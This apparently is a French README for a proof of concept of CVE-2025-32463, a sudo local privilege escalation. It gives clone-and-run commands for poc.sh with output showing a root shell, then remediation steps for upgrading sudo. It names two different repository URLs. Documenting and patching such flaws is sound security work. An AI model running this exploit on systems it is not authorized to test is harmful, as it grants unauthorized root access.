
Preuve de concept pour CVE-2025-32463, une élévation de privilèges locale dans les versions de sudo 1.9.14-1.9.17, avec bibliothèque précompilée et instructions de remédiation.
Ce dépôt contient une preuve de concept (PoC) pour CVE-2025-32463, une vulnérabilité d'élévation de privilèges locale dans sudo découverte par Rich Mirch.
https://github.com/kh4sh3i/CVE-2025-32463
Ce PoC est destiné uniquement à des fins éducatives et de tests autorisés. N'utilisez pas ce code sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite d'évaluer.
git clone https://github.com/zinzloun/CVE-2025-32463.git
cd CVE-2025-32463
Vérifiez si l'utilisateur actuel dispose de privilèges faibles
:~/CVE-2025-32463$ id
uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)
Vérifiez les prérequis
:~/CVE-2025-32463$ sudo --version
Sudo version 1.9.15p5
...
:~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
-rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf
Exécutez l'exploit
:~/CVE-2025-32463$ chmod +x poc.sh && ./poc.sh
woot!
root@ubutes01:/# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)
Pour les systèmes connectés, exécutez simplement
sudo apt update && sudo apt upgrade
Pour les systèmes isolés (air gapped) : vous pouvez obtenir le dernier paquet sudo ici : https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb. Une fois le paquet transféré sur le système cible, exécutez simplement :
sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb